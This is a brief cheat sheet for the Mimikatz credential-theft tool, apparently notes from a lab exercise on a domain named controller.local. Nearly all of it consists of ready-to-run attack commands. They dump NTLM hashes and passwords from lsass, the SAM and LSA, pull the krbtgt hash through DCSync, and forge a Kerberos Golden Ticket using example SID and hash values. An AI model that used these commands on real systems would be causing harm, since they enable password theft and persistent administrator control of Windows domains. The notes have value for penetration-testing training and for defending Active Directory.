Mimikatz requires Admin privileges to function
Check Privilege : privilege::debug
log <filename>: Logs all commands into a log file
Dumping Hashes
LSA : Local Security Authority
lsass.exe : Local Security Authority Subsystem Service
SAM : Security Accounts Manager
sekurlsa::logonpasswords
Returns NTLM passwords stored in memory using lsass.exe service
On older versions of Windows plaintext passwords where returned
lsadump::sam
Dump content of SAM database
lsadump::lsa
Dump LSA credentials
If NTLM hashes are not shown use the /patch option
Kerberos Golden Ticket Attack
For getting the Golden Ticket we need to have access to a user that has some sort of Admin privilege on Active Directory
lsadump::lsa /inject /name:krbtgt
Retrieve the Hash of the krbtgt account from the Domain Controller
lsadump::dcsync /domain:controller.local /user:krbtgt
Fetch Hash of Kerberos account using Dcsync Feature
kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /id:500
Generate a Golden Ticket and add in current session
/user : Can use any name
/sid : Krbtgt user sid
/krbtgt : NTLM Hash
/id : Id of domain admin account (Usually 500)